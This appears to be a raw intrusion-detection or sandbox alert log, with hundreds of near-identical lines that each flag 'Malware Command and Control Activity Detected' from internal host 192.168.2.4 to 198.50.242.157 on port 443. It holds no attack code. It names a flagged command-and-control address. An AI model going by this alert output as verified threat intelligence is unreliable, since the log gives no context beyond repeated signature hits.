                  2025-01-11T20:08:05.490615+010020327761Malware Command and Control Activity Detected192.168.2.450411198.50.242.157443TCP
                  2025-01-11T20:08:05.491640+010020327761Malware Command and Control Activity Detected192.168.2.450412198.50.242.157443TCP
                  2025-01-11T20:08:05.492691+010020327761Malware Command and Control Activity Detected192.168.2.450413198.50.242.157443TCP
                  2025-01-11T20:08:05.494105+010020327761Malware Command and Control Activity Detected192.168.2.450414198.50.242.157443TCP
                  2025-01-11T20:08:05.495446+010020327761Malware Command and Control Activity Detected192.168.2.450415198.50.242.157443TCP
                  2025-01-11T20:08:05.496459+010020327761Malware Command and Control Activity Detected192.168.2.450416198.50.242.157443TCP
                  2025-01-11T20:08:05.497648+010020327761Malware Command and Control Activity Detected192.168.2.450417198.50.242.157443TCP
                  2025-01-11T20:08:05.498999+010020327761Malware Command and Control Activity Detected192.168.2.450418198.50.242.157443TCP
                  2025-01-11T20:08:05.501009+010020327761Malware Command and Control Activity Detected192.168.2.450419198.50.242.157443TCP
                  2025-01-11T20:08:05.501974+010020327761Malware Command and Control Activity Detected192.168.2.450420198.50.242.157443TCP
                  2025-01-11T20:08:05.505042+010020327761Malware Command and Control Activity Detected192.168.2.450421198.50.242.157443TCP
                  2025-01-11T20:08:05.505806+010020327761Malware Command and Control Activity Detected192.168.2.450422198.50.242.157443TCP
                  2025-01-11T20:08:05.506989+010020327761Malware Command and Control Activity Detected192.168.2.450423198.50.242.157443TCP
                  2025-01-11T20:08:05.507854+010020327761Malware Command and Control Activity Detected192.168.2.450424198.50.242.157443TCP
                  2025-01-11T20:08:05.509204+010020327761Malware Command and Control Activity Detected192.168.2.450425198.50.242.157443TCP
                  2025-01-11T20:08:05.510888+010020327761Malware Command and Control Activity Detected192.168.2.450426198.50.242.157443TCP
                  2025-01-11T20:08:05.513536+010020327761Malware Command and Control Activity Detected192.168.2.450428198.50.242.157443TCP
                  2025-01-11T20:08:05.514924+010020327761Malware Command and Control Activity Detected192.168.2.450429198.50.242.157443TCP
                  2025-01-11T20:08:05.516186+010020327761Malware Command and Control Activity Detected192.168.2.450430198.50.242.157443TCP
                  2025-01-11T20:08:05.518032+010020327761Malware Command and Control Activity Detected192.168.2.450431198.50.242.157443TCP
                  2025-01-11T20:08:05.519594+010020327761Malware Command and Control Activity Detected192.168.2.450432198.50.242.157443TCP
                  2025-01-11T20:08:05.521301+010020327761Malware Command and Control Activity Detected192.168.2.450433198.50.242.157443TCP
                  2025-01-11T20:08:05.522926+010020327761Malware Command and Control Activity Detected192.168.2.450434198.50.242.157443TCP
                  2025-01-11T20:08:05.526148+010020327761Malware Command and Control Activity Detected192.168.2.450435198.50.242.157443TCP
                  2025-01-11T20:08:05.528040+010020327761Malware Command and Control Activity Detected192.168.2.450436198.50.242.157443TCP
                  2025-01-11T20:08:05.529895+010020327761Malware Command and Control Activity Detected192.168.2.450437198.50.242.157443TCP
                  2025-01-11T20:08:05.531161+010020327761Malware Command and Control Activity Detected192.168.2.450438198.50.242.157443TCP
                  2025-01-11T20:08:05.532481+010020327761Malware Command and Control Activity Detected192.168.2.450439198.50.242.157443TCP
                  2025-01-11T20:08:05.534060+010020327761Malware Command and Control Activity Detected192.168.2.450440198.50.242.157443TCP
                  2025-01-11T20:08:05.536214+010020327761Malware Command and Control Activity Detected192.168.2.450442198.50.242.157443TCP
                  2025-01-11T20:08:05.540203+010020327761Malware Command and Control Activity Detected192.168.2.450443198.50.242.157443TCP
                  2025-01-11T20:08:05.541715+010020327761Malware Command and Control Activity Detected192.168.2.450444198.50.242.157443TCP
                  2025-01-11T20:08:05.543501+010020327761Malware Command and Control Activity Detected192.168.2.450446198.50.242.157443TCP
                  2025-01-11T20:08:05.544742+010020327761Malware Command and Control Activity Detected192.168.2.450447198.50.242.157443TCP
                  2025-01-11T20:08:05.546173+010020327761Malware Command and Control Activity Detected192.168.2.450448198.50.242.157443TCP
                  2025-01-11T20:08:05.547580+010020327761Malware Command and Control Activity Detected192.168.2.450449198.50.242.157443TCP
                  2025-01-11T20:08:05.548812+010020327761Malware Command and Control Activity Detected192.168.2.450450198.50.242.157443TCP
                  2025-01-11T20:08:05.552802+010020327761Malware Command and Control Activity Detected192.168.2.450451198.50.242.157443TCP
                  2025-01-11T20:08:05.557679+010020327761Malware Command and Control Activity Detected192.168.2.450452198.50.242.157443TCP
                  2025-01-11T20:08:05.567831+010020327761Malware Command and Control Activity Detected192.168.2.450453198.50.242.157443TCP
                  2025-01-11T20:08:05.580422+010020327761Malware Command and Control Activity Detected192.168.2.450455198.50.242.157443TCP
                  2025-01-11T20:08:05.584072+010020327761Malware Command and Control Activity Detected192.168.2.450457198.50.242.157443TCP
                  2025-01-11T20:08:05.585782+010020327761Malware Command and Control Activity Detected192.168.2.450458198.50.242.157443TCP
                  2025-01-11T20:08:05.587249+010020327761Malware Command and Control Activity Detected192.168.2.450459198.50.242.157443TCP
                  2025-01-11T20:08:05.590121+010020327761Malware Command and Control Activity Detected192.168.2.450460198.50.242.157443TCP
                  2025-01-11T20:08:05.595994+010020327761Malware Command and Control Activity Detected192.168.2.450461198.50.242.157443TCP
                  2025-01-11T20:08:05.598693+010020327761Malware Command and Control Activity Detected192.168.2.450463198.50.242.157443TCP
                  2025-01-11T20:08:05.599749+010020327761Malware Command and Control Activity Detected192.168.2.450464198.50.242.157443TCP
                  2025-01-11T20:08:05.600840+010020327761Malware Command and Control Activity Detected192.168.2.450465198.50.242.157443TCP
                  2025-01-11T20:08:05.602261+010020327761Malware Command and Control Activity Detected192.168.2.450466198.50.242.157443TCP
                  2025-01-11T20:08:05.603667+010020327761Malware Command and Control Activity Detected192.168.2.450467198.50.242.157443TCP
                  2025-01-11T20:08:05.604756+010020327761Malware Command and Control Activity Detected192.168.2.450468198.50.242.157443TCP
                  2025-01-11T20:08:05.606149+010020327761Malware Command and Control Activity Detected192.168.2.450469198.50.242.157443TCP
                  2025-01-11T20:08:05.607355+010020327761Malware Command and Control Activity Detected192.168.2.450470198.50.242.157443TCP
                  2025-01-11T20:08:05.611636+010020327761Malware Command and Control Activity Detected192.168.2.450472198.50.242.157443TCP
                  2025-01-11T20:08:05.613201+010020327761Malware Command and Control Activity Detected192.168.2.450473198.50.242.157443TCP
                  2025-01-11T20:08:05.614799+010020327761Malware Command and Control Activity Detected192.168.2.450474198.50.242.157443TCP
                  2025-01-11T20:08:05.616592+010020327761Malware Command and Control Activity Detected192.168.2.450475198.50.242.157443TCP
                  2025-01-11T20:08:05.617708+010020327761Malware Command and Control Activity Detected192.168.2.450476198.50.242.157443TCP
                  2025-01-11T20:08:05.618873+010020327761Malware Command and Control Activity Detected192.168.2.450477198.50.242.157443TCP
                  2025-01-11T20:08:05.620478+010020327761Malware Command and Control Activity Detected192.168.2.450478198.50.242.157443TCP
                  2025-01-11T20:08:05.621204+010020327761Malware Command and Control Activity Detected192.168.2.450479198.50.242.157443TCP
                  2025-01-11T20:08:05.623152+010020327761Malware Command and Control Activity Detected192.168.2.450480198.50.242.157443TCP
                  2025-01-11T20:08:05.624883+010020327761Malware Command and Control Activity Detected192.168.2.450482198.50.242.157443TCP
                  2025-01-11T20:08:05.625789+010020327761Malware Command and Control Activity Detected192.168.2.450483198.50.242.157443TCP
                  2025-01-11T20:08:05.626849+010020327761Malware Command and Control Activity Detected192.168.2.450484198.50.242.157443TCP
                  2025-01-11T20:08:05.627886+010020327761Malware Command and Control Activity Detected192.168.2.450485198.50.242.157443TCP
                  2025-01-11T20:08:05.631598+010020327761Malware Command and Control Activity Detected192.168.2.450487198.50.242.157443TCP
                  2025-01-11T20:08:05.634678+010020327761Malware Command and Control Activity Detected192.168.2.450489198.50.242.157443TCP
                  2025-01-11T20:08:05.637197+010020327761Malware Command and Control Activity Detected192.168.2.450490198.50.242.157443TCP
                  2025-01-11T20:08:05.639070+010020327761Malware Command and Control Activity Detected192.168.2.450491198.50.242.157443TCP
                  2025-01-11T20:08:05.642953+010020327761Malware Command and Control Activity Detected192.168.2.450492198.50.242.157443TCP
                  2025-01-11T20:08:05.645847+010020327761Malware Command and Control Activity Detected192.168.2.450493198.50.242.157443TCP
                  2025-01-11T20:08:05.646868+010020327761Malware Command and Control Activity Detected192.168.2.450494198.50.242.157443TCP
                  2025-01-11T20:08:05.649341+010020327761Malware Command and Control Activity Detected192.168.2.450495198.50.242.157443TCP
                  2025-01-11T20:08:05.651035+010020327761Malware Command and Control Activity Detected192.168.2.450496198.50.242.157443TCP
                  2025-01-11T20:08:05.651780+010020327761Malware Command and Control Activity Detected192.168.2.450497198.50.242.157443TCP
                  2025-01-11T20:08:05.653621+010020327761Malware Command and Control Activity Detected192.168.2.450498198.50.242.157443TCP
                  2025-01-11T20:08:05.655482+010020327761Malware Command and Control Activity Detected192.168.2.450499198.50.242.157443TCP
                  2025-01-11T20:08:05.657513+010020327761Malware Command and Control Activity Detected192.168.2.450500198.50.242.157443TCP
                  2025-01-11T20:08:05.661535+010020327761Malware Command and Control Activity Detected192.168.2.450502198.50.242.157443TCP
                  2025-01-11T20:08:05.662402+010020327761Malware Command and Control Activity Detected192.168.2.450503198.50.242.157443TCP
                  2025-01-11T20:08:05.663841+010020327761Malware Command and Control Activity Detected192.168.2.450504198.50.242.157443TCP
                  2025-01-11T20:08:05.668092+010020327761Malware Command and Control Activity Detected192.168.2.450506198.50.242.157443TCP
                  2025-01-11T20:08:05.671408+010020327761Malware Command and Control Activity Detected192.168.2.450507198.50.242.157443TCP
                  2025-01-11T20:08:05.676759+010020327761Malware Command and Control Activity Detected192.168.2.450509198.50.242.157443TCP
                  2025-01-11T20:08:05.680544+010020327761Malware Command and Control Activity Detected192.168.2.450510198.50.242.157443TCP
                  2025-01-11T20:08:05.682011+010020327761Malware Command and Control Activity Detected192.168.2.450511198.50.242.157443TCP
                  2025-01-11T20:08:05.686758+010020327761Malware Command and Control Activity Detected192.168.2.450516198.50.242.157443TCP
                  2025-01-11T20:08:05.687762+010020327761Malware Command and Control Activity Detected192.168.2.450517198.50.242.157443TCP
                  2025-01-11T20:08:05.688593+010020327761Malware Command and Control Activity Detected192.168.2.450518198.50.242.157443TCP
                  2025-01-11T20:08:05.690025+010020327761Malware Command and Control Activity Detected192.168.2.450519198.50.242.157443TCP
                  2025-01-11T20:08:05.691122+010020327761Malware Command and Control Activity Detected192.168.2.450520198.50.242.157443TCP
                  2025-01-11T20:08:05.695602+010020327761Malware Command and Control Activity Detected192.168.2.450522198.50.242.157443TCP
                  2025-01-11T20:08:05.696407+010020327761Malware Command and Control Activity Detected192.168.2.450523198.50.242.157443TCP
                  2025-01-11T20:08:05.699345+010020327761Malware Command and Control Activity Detected192.168.2.450524198.50.242.157443TCP
                  2025-01-11T20:08:05.703266+010020327761Malware Command and Control Activity Detected192.168.2.450525198.50.242.157443TCP
                  2025-01-11T20:08:05.705018+010020327761Malware Command and Control Activity Detected192.168.2.450526198.50.242.157443TCP
                  2025-01-11T20:08:05.705789+010020327761Malware Command and Control Activity Detected192.168.2.450527198.50.242.157443TCP
                  2025-01-11T20:08:05.709319+010020327761Malware Command and Control Activity Detected192.168.2.450530198.50.242.157443TCP
                  2025-01-11T20:08:05.710175+010020327761Malware Command and Control Activity Detected192.168.2.450531198.50.242.157443TCP
                  2025-01-11T20:08:05.710963+010020327761Malware Command and Control Activity Detected192.168.2.450532198.50.242.157443TCP
                  2025-01-11T20:08:05.712420+010020327761Malware Command and Control Activity Detected192.168.2.450533198.50.242.157443TCP
                  2025-01-11T20:08:05.713350+010020327761Malware Command and Control Activity Detected192.168.2.450534198.50.242.157443TCP
                  2025-01-11T20:08:05.716058+010020327761Malware Command and Control Activity Detected192.168.2.450536198.50.242.157443TCP
                  2025-01-11T20:08:05.716930+010020327761Malware Command and Control Activity Detected192.168.2.450537198.50.242.157443TCP
                  2025-01-11T20:08:05.718959+010020327761Malware Command and Control Activity Detected192.168.2.450538198.50.242.157443TCP
                  2025-01-11T20:08:05.719868+010020327761Malware Command and Control Activity Detected192.168.2.450539198.50.242.157443TCP
                  2025-01-11T20:08:05.720941+010020327761Malware Command and Control Activity Detected192.168.2.450540198.50.242.157443TCP
                  2025-01-11T20:08:05.721841+010020327761Malware Command and Control Activity Detected192.168.2.450541198.50.242.157443TCP
                  2025-01-11T20:08:05.722856+010020327761Malware Command and Control Activity Detected192.168.2.450542198.50.242.157443TCP
                  2025-01-11T20:08:05.727464+010020327761Malware Command and Control Activity Detected192.168.2.450546198.50.242.157443TCP
                  2025-01-11T20:08:05.728457+010020327761Malware Command and Control Activity Detected192.168.2.450547198.50.242.157443TCP
                  2025-01-11T20:08:05.729265+010020327761Malware Command and Control Activity Detected192.168.2.450548198.50.242.157443TCP
                  2025-01-11T20:08:05.730122+010020327761Malware Command and Control Activity Detected192.168.2.450549198.50.242.157443TCP
                  2025-01-11T20:08:05.730978+010020327761Malware Command and Control Activity Detected192.168.2.450550198.50.242.157443TCP
                  2025-01-11T20:08:05.731899+010020327761Malware Command and Control Activity Detected192.168.2.450551198.50.242.157443TCP
                  2025-01-11T20:08:05.732871+010020327761Malware Command and Control Activity Detected192.168.2.450552198.50.242.157443TCP
                  2025-01-11T20:08:05.733901+010020327761Malware Command and Control Activity Detected192.168.2.450553198.50.242.157443TCP
                  2025-01-11T20:08:05.735034+010020327761Malware Command and Control Activity Detected192.168.2.450554198.50.242.157443TCP
                  2025-01-11T20:08:05.737128+010020327761Malware Command and Control Activity Detected192.168.2.450556198.50.242.157443TCP
                  2025-01-11T20:08:05.738342+010020327761Malware Command and Control Activity Detected192.168.2.450557198.50.242.157443TCP
                  2025-01-11T20:08:05.739151+010020327761Malware Command and Control Activity Detected192.168.2.450558198.50.242.157443TCP
                  2025-01-11T20:08:05.740842+010020327761Malware Command and Control Activity Detected192.168.2.450559198.50.242.157443TCP
                  2025-01-11T20:08:05.743615+010020327761Malware Command and Control Activity Detected192.168.2.450561198.50.242.157443TCP
                  2025-01-11T20:08:05.744613+010020327761Malware Command and Control Activity Detected192.168.2.450562198.50.242.157443TCP
                  2025-01-11T20:08:05.745482+010020327761Malware Command and Control Activity Detected192.168.2.450563198.50.242.157443TCP
                  2025-01-11T20:08:05.746442+010020327761Malware Command and Control Activity Detected192.168.2.450564198.50.242.157443TCP
                  2025-01-11T20:08:05.747588+010020327761Malware Command and Control Activity Detected192.168.2.450565198.50.242.157443TCP
                  2025-01-11T20:08:05.748545+010020327761Malware Command and Control Activity Detected192.168.2.450566198.50.242.157443TCP
                  2025-01-11T20:08:05.751794+010020327761Malware Command and Control Activity Detected192.168.2.450569198.50.242.157443TCP
                  2025-01-11T20:08:05.753099+010020327761Malware Command and Control Activity Detected192.168.2.450570198.50.242.157443TCP
                  2025-01-11T20:08:05.754261+010020327761Malware Command and Control Activity Detected192.168.2.450571198.50.242.157443TCP
                  2025-01-11T20:08:05.758238+010020327761Malware Command and Control Activity Detected192.168.2.450573198.50.242.157443TCP
                  2025-01-11T20:08:05.777830+010020327761Malware Command and Control Activity Detected192.168.2.450576198.50.242.157443TCP
                  2025-01-11T20:08:05.778705+010020327761Malware Command and Control Activity Detected192.168.2.450577198.50.242.157443TCP
                  2025-01-11T20:08:05.784528+010020327761Malware Command and Control Activity Detected192.168.2.450580198.50.242.157443TCP
                  2025-01-11T20:08:05.785980+010020327761Malware Command and Control Activity Detected192.168.2.450581198.50.242.157443TCP
                  2025-01-11T20:08:05.787066+010020327761Malware Command and Control Activity Detected192.168.2.450582198.50.242.157443TCP
                  2025-01-11T20:08:05.788028+010020327761Malware Command and Control Activity Detected192.168.2.450583198.50.242.157443TCP
                  2025-01-11T20:08:05.789417+010020327761Malware Command and Control Activity Detected192.168.2.450584198.50.242.157443TCP
                  2025-01-11T20:08:05.790301+010020327761Malware Command and Control Activity Detected192.168.2.450585198.50.242.157443TCP
                  2025-01-11T20:08:05.791763+010020327761Malware Command and Control Activity Detected192.168.2.450586198.50.242.157443TCP
                  2025-01-11T20:08:05.793645+010020327761Malware Command and Control Activity Detected192.168.2.450587198.50.242.157443TCP
                  2025-01-11T20:08:05.794999+010020327761Malware Command and Control Activity Detected192.168.2.450588198.50.242.157443TCP
                  2025-01-11T20:08:05.796565+010020327761Malware Command and Control Activity Detected192.168.2.450589198.50.242.157443TCP
                  2025-01-11T20:08:05.798384+010020327761Malware Command and Control Activity Detected192.168.2.450591198.50.242.157443TCP
                  2025-01-11T20:08:05.800112+010020327761Malware Command and Control Activity Detected192.168.2.450592198.50.242.157443TCP
                  2025-01-11T20:08:05.801139+010020327761Malware Command and Control Activity Detected192.168.2.450593198.50.242.157443TCP
                  2025-01-11T20:08:05.802789+010020327761Malware Command and Control Activity Detected192.168.2.450594198.50.242.157443TCP
                  2025-01-11T20:08:05.803904+010020327761Malware Command and Control Activity Detected192.168.2.450595198.50.242.157443TCP
                  2025-01-11T20:08:05.806667+010020327761Malware Command and Control Activity Detected192.168.2.450596198.50.242.157443TCP
                  2025-01-11T20:08:05.815555+010020327761Malware Command and Control Activity Detected192.168.2.450597198.50.242.157443TCP
                  2025-01-11T20:08:05.818038+010020327761Malware Command and Control Activity Detected192.168.2.450598198.50.242.157443TCP
                  2025-01-11T20:08:05.820496+010020327761Malware Command and Control Activity Detected192.168.2.450600198.50.242.157443TCP
                  2025-01-11T20:08:05.822182+010020327761Malware Command and Control Activity Detected192.168.2.450601198.50.242.157443TCP
                  2025-01-11T20:08:05.823518+010020327761Malware Command and Control Activity Detected192.168.2.450602198.50.242.157443TCP
                  2025-01-11T20:08:05.824582+010020327761Malware Command and Control Activity Detected192.168.2.450603198.50.242.157443TCP
                  2025-01-11T20:08:05.826264+010020327761Malware Command and Control Activity Detected192.168.2.450604198.50.242.157443TCP
                  2025-01-11T20:08:05.827806+010020327761Malware Command and Control Activity Detected192.168.2.450605198.50.242.157443TCP
                  2025-01-11T20:08:05.829479+010020327761Malware Command and Control Activity Detected192.168.2.450606198.50.242.157443TCP
                  2025-01-11T20:08:05.830733+010020327761Malware Command and Control Activity Detected192.168.2.450607198.50.242.157443TCP
                  2025-01-11T20:08:05.832031+010020327761Malware Command and Control Activity Detected192.168.2.450608198.50.242.157443TCP
                  2025-01-11T20:08:05.835215+010020327761Malware Command and Control Activity Detected192.168.2.450610198.50.242.157443TCP
                  2025-01-11T20:08:05.837701+010020327761Malware Command and Control Activity Detected192.168.2.450612198.50.242.157443TCP
                  2025-01-11T20:08:05.840576+010020327761Malware Command and Control Activity Detected192.168.2.450613198.50.242.157443TCP
                  2025-01-11T20:08:05.841790+010020327761Malware Command and Control Activity Detected192.168.2.450614198.50.242.157443TCP
                  2025-01-11T20:08:05.843886+010020327761Malware Command and Control Activity Detected192.168.2.450615198.50.242.157443TCP
                  2025-01-11T20:08:05.844993+010020327761Malware Command and Control Activity Detected192.168.2.450616198.50.242.157443TCP
                  2025-01-11T20:08:05.846840+010020327761Malware Command and Control Activity Detected192.168.2.450617198.50.242.157443TCP
                  2025-01-11T20:08:05.848371+010020327761Malware Command and Control Activity Detected192.168.2.450618198.50.242.157443TCP
                  2025-01-11T20:08:05.850503+010020327761Malware Command and Control Activity Detected192.168.2.450619198.50.242.157443TCP
                  2025-01-11T20:08:05.852077+010020327761Malware Command and Control Activity Detected192.168.2.450620198.50.242.157443TCP
                  2025-01-11T20:08:05.853449+010020327761Malware Command and Control Activity Detected192.168.2.450621198.50.242.157443TCP
                  2025-01-11T20:08:05.856183+010020327761Malware Command and Control Activity Detected192.168.2.450623198.50.242.157443TCP
                  2025-01-11T20:08:05.857704+010020327761Malware Command and Control Activity Detected192.168.2.450624198.50.242.157443TCP
                  2025-01-11T20:08:05.858977+010020327761Malware Command and Control Activity Detected192.168.2.450625198.50.242.157443TCP
                  2025-01-11T20:08:05.860892+010020327761Malware Command and Control Activity Detected192.168.2.450626198.50.242.157443TCP
                  2025-01-11T20:08:05.862828+010020327761Malware Command and Control Activity Detected192.168.2.450627198.50.242.157443TCP
                  2025-01-11T20:08:05.864228+010020327761Malware Command and Control Activity Detected192.168.2.450628198.50.242.157443TCP
                  2025-01-11T20:08:05.866057+010020327761Malware Command and Control Activity Detected192.168.2.450629198.50.242.157443TCP
                  2025-01-11T20:08:05.866957+010020327761Malware Command and Control Activity Detected192.168.2.450630198.50.242.157443TCP
                  2025-01-11T20:08:05.868379+010020327761Malware Command and Control Activity Detected192.168.2.450631198.50.242.157443TCP
                  2025-01-11T20:08:05.869689+010020327761Malware Command and Control Activity Detected192.168.2.450632198.50.242.157443TCP
                  2025-01-11T20:08:05.870839+010020327761Malware Command and Control Activity Detected192.168.2.450633198.50.242.157443TCP
                  2025-01-11T20:08:05.872170+010020327761Malware Command and Control Activity Detected192.168.2.450634198.50.242.157443TCP
                  2025-01-11T20:08:05.873960+010020327761Malware Command and Control Activity Detected192.168.2.450635198.50.242.157443TCP
                  2025-01-11T20:08:05.874979+010020327761Malware Command and Control Activity Detected192.168.2.450636198.50.242.157443TCP
                  2025-01-11T20:08:05.877452+010020327761Malware Command and Control Activity Detected192.168.2.450637198.50.242.157443TCP
                  2025-01-11T20:08:05.881053+010020327761Malware Command and Control Activity Detected192.168.2.450639198.50.242.157443TCP
                  2025-01-11T20:08:05.885678+010020327761Malware Command and Control Activity Detected192.168.2.450640198.50.242.157443TCP
                  2025-01-11T20:08:05.887050+010020327761Malware Command and Control Activity Detected192.168.2.450641198.50.242.157443TCP
                  2025-01-11T20:08:05.890914+010020327761Malware Command and Control Activity Detected192.168.2.450644198.50.242.157443TCP
                  2025-01-11T20:08:05.892061+010020327761Malware Command and Control Activity Detected192.168.2.450645198.50.242.157443TCP
                  2025-01-11T20:08:05.893841+010020327761Malware Command and Control Activity Detected192.168.2.450646198.50.242.157443TCP
                  2025-01-11T20:08:05.896271+010020327761Malware Command and Control Activity Detected192.168.2.450648198.50.242.157443TCP
                  2025-01-11T20:08:05.900569+010020327761Malware Command and Control Activity Detected192.168.2.450651198.50.242.157443TCP
                  2025-01-11T20:08:05.902058+010020327761Malware Command and Control Activity Detected192.168.2.450652198.50.242.157443TCP
                  2025-01-11T20:08:05.903645+010020327761Malware Command and Control Activity Detected192.168.2.450653198.50.242.157443TCP
                  2025-01-11T20:08:05.905605+010020327761Malware Command and Control Activity Detected192.168.2.450654198.50.242.157443TCP
                  2025-01-11T20:08:05.907129+010020327761Malware Command and Control Activity Detected192.168.2.450655198.50.242.157443TCP
                  2025-01-11T20:08:05.908348+010020327761Malware Command and Control Activity Detected192.168.2.450656198.50.242.157443TCP
                  2025-01-11T20:08:05.909499+010020327761Malware Command and Control Activity Detected192.168.2.450657198.50.242.157443TCP
                  2025-01-11T20:08:05.910725+010020327761Malware Command and Control Activity Detected192.168.2.450658198.50.242.157443TCP
                  2025-01-11T20:08:05.912091+010020327761Malware Command and Control Activity Detected192.168.2.450659198.50.242.157443TCP
                  2025-01-11T20:08:05.920200+010020327761Malware Command and Control Activity Detected192.168.2.450660198.50.242.157443TCP
                  2025-01-11T20:08:05.937224+010020327761Malware Command and Control Activity Detected192.168.2.450661198.50.242.157443TCP
                  2025-01-11T20:08:05.938975+010020327761Malware Command and Control Activity Detected192.168.2.450662198.50.242.157443TCP
                  2025-01-11T20:08:05.940387+010020327761Malware Command and Control Activity Detected192.168.2.450663198.50.242.157443TCP
                  2025-01-11T20:08:05.941816+010020327761Malware Command and Control Activity Detected192.168.2.450664198.50.242.157443TCP
                  2025-01-11T20:08:05.943856+010020327761Malware Command and Control Activity Detected192.168.2.450666198.50.242.157443TCP
                  2025-01-11T20:08:05.944841+010020327761Malware Command and Control Activity Detected192.168.2.450667198.50.242.157443TCP
                  2025-01-11T20:08:05.945794+010020327761Malware Command and Control Activity Detected192.168.2.450668198.50.242.157443TCP
                  2025-01-11T20:08:05.946967+010020327761Malware Command and Control Activity Detected192.168.2.450669198.50.242.157443TCP
                  2025-01-11T20:08:05.948019+010020327761Malware Command and Control Activity Detected192.168.2.450670198.50.242.157443TCP
                  2025-01-11T20:08:05.948988+010020327761Malware Command and Control Activity Detected192.168.2.450671198.50.242.157443TCP
                  2025-01-11T20:08:05.949946+010020327761Malware Command and Control Activity Detected192.168.2.450672198.50.242.157443TCP
                  2025-01-11T20:08:05.950985+010020327761Malware Command and Control Activity Detected192.168.2.450673198.50.242.157443TCP
                  2025-01-11T20:08:05.952090+010020327761Malware Command and Control Activity Detected192.168.2.450674198.50.242.157443TCP
                  2025-01-11T20:08:05.953385+010020327761Malware Command and Control Activity Detected192.168.2.450675198.50.242.157443TCP
                  2025-01-11T20:08:05.954258+010020327761Malware Command and Control Activity Detected192.168.2.450676198.50.242.157443TCP
                  2025-01-11T20:08:05.957912+010020327761Malware Command and Control Activity Detected192.168.2.450679198.50.242.157443TCP
                  2025-01-11T20:08:05.958939+010020327761Malware Command and Control Activity Detected192.168.2.450680198.50.242.157443TCP
                  2025-01-11T20:08:05.959950+010020327761Malware Command and Control Activity Detected192.168.2.450681198.50.242.157443TCP
                  2025-01-11T20:08:05.960856+010020327761Malware Command and Control Activity Detected192.168.2.450682198.50.242.157443TCP
                  2025-01-11T20:08:05.962027+010020327761Malware Command and Control Activity Detected192.168.2.450683198.50.242.157443TCP
                  2025-01-11T20:08:05.962838+010020327761Malware Command and Control Activity Detected192.168.2.450684198.50.242.157443TCP
                  2025-01-11T20:08:05.963923+010020327761Malware Command and Control Activity Detected192.168.2.450685198.50.242.157443TCP
                  2025-01-11T20:08:05.964900+010020327761Malware Command and Control Activity Detected192.168.2.450686198.50.242.157443TCP
                  2025-01-11T20:08:05.966355+010020327761Malware Command and Control Activity Detected192.168.2.450687198.50.242.157443TCP
                  2025-01-11T20:08:05.967221+010020327761Malware Command and Control Activity Detected192.168.2.450688198.50.242.157443TCP
                  2025-01-11T20:08:05.968268+010020327761Malware Command and Control Activity Detected192.168.2.450689198.50.242.157443TCP
                  2025-01-11T20:08:05.969218+010020327761Malware Command and Control Activity Detected192.168.2.450690198.50.242.157443TCP
                  2025-01-11T20:08:05.971034+010020327761Malware Command and Control Activity Detected192.168.2.450692198.50.242.157443TCP
                  2025-01-11T20:08:05.972010+010020327761Malware Command and Control Activity Detected192.168.2.450693198.50.242.157443TCP
                  2025-01-11T20:08:05.973052+010020327761Malware Command and Control Activity Detected192.168.2.450694198.50.242.157443TCP
                  2025-01-11T20:08:05.974020+010020327761Malware Command and Control Activity Detected192.168.2.450695198.50.242.157443TCP
                  2025-01-11T20:08:05.974954+010020327761Malware Command and Control Activity Detected192.168.2.450696198.50.242.157443TCP
                  2025-01-11T20:08:05.975777+010020327761Malware Command and Control Activity Detected192.168.2.450697198.50.242.157443TCP
                  2025-01-11T20:08:05.977689+010020327761Malware Command and Control Activity Detected192.168.2.450699198.50.242.157443TCP
                  2025-01-11T20:08:05.979940+010020327761Malware Command and Control Activity Detected192.168.2.450701198.50.242.157443TCP
                  2025-01-11T20:08:05.980775+010020327761Malware Command and Control Activity Detected192.168.2.450702198.50.242.157443TCP
                  2025-01-11T20:08:05.981933+010020327761Malware Command and Control Activity Detected192.168.2.450703198.50.242.157443TCP
                  2025-01-11T20:08:05.982875+010020327761Malware Command and Control Activity Detected192.168.2.450704198.50.242.157443TCP
                  2025-01-11T20:08:05.983777+010020327761Malware Command and Control Activity Detected192.168.2.450705198.50.242.157443TCP
                  2025-01-11T20:08:05.984967+010020327761Malware Command and Control Activity Detected192.168.2.450706198.50.242.157443TCP
                  2025-01-11T20:08:05.985769+010020327761Malware Command and Control Activity Detected192.168.2.450707198.50.242.157443TCP
                  2025-01-11T20:08:05.986662+010020327761Malware Command and Control Activity Detected192.168.2.450708198.50.242.157443TCP
                  2025-01-11T20:08:05.987488+010020327761Malware Command and Control Activity Detected192.168.2.450709198.50.242.157443TCP
                  2025-01-11T20:08:05.988315+010020327761Malware Command and Control Activity Detected192.168.2.450710198.50.242.157443TCP
                  2025-01-11T20:08:05.989315+010020327761Malware Command and Control Activity Detected192.168.2.450711198.50.242.157443TCP
                  2025-01-11T20:08:05.990306+010020327761Malware Command and Control Activity Detected192.168.2.450712198.50.242.157443TCP
                  2025-01-11T20:08:05.993120+010020327761Malware Command and Control Activity Detected192.168.2.450715198.50.242.157443TCP
                  2025-01-11T20:08:05.995155+010020327761Malware Command and Control Activity Detected192.168.2.450717198.50.242.157443TCP
                  2025-01-11T20:08:05.996066+010020327761Malware Command and Control Activity Detected192.168.2.450718198.50.242.157443TCP
                  2025-01-11T20:08:05.997601+010020327761Malware Command and Control Activity Detected192.168.2.450719198.50.242.157443TCP
                  2025-01-11T20:08:05.999805+010020327761Malware Command and Control Activity Detected192.168.2.450721198.50.242.157443TCP
                  2025-01-11T20:08:06.000629+010020327761Malware Command and Control Activity Detected192.168.2.450722198.50.242.157443TCP
                  2025-01-11T20:08:06.003057+010020327761Malware Command and Control Activity Detected192.168.2.450724198.50.242.157443TCP
                  2025-01-11T20:08:06.004166+010020327761Malware Command and Control Activity Detected192.168.2.450725198.50.242.157443TCP
                  2025-01-11T20:08:06.005161+010020327761Malware Command and Control Activity Detected192.168.2.450726198.50.242.157443TCP
                  2025-01-11T20:08:06.005977+010020327761Malware Command and Control Activity Detected192.168.2.450727198.50.242.157443TCP
                  2025-01-11T20:08:06.007297+010020327761Malware Command and Control Activity Detected192.168.2.450728198.50.242.157443TCP
                  2025-01-11T20:08:06.008107+010020327761Malware Command and Control Activity Detected192.168.2.450729198.50.242.157443TCP
                  2025-01-11T20:08:06.010642+010020327761Malware Command and Control Activity Detected192.168.2.450732198.50.242.157443TCP
                  2025-01-11T20:08:06.013716+010020327761Malware Command and Control Activity Detected192.168.2.450735198.50.242.157443TCP
                  2025-01-11T20:08:06.016097+010020327761Malware Command and Control Activity Detected192.168.2.450737198.50.242.157443TCP
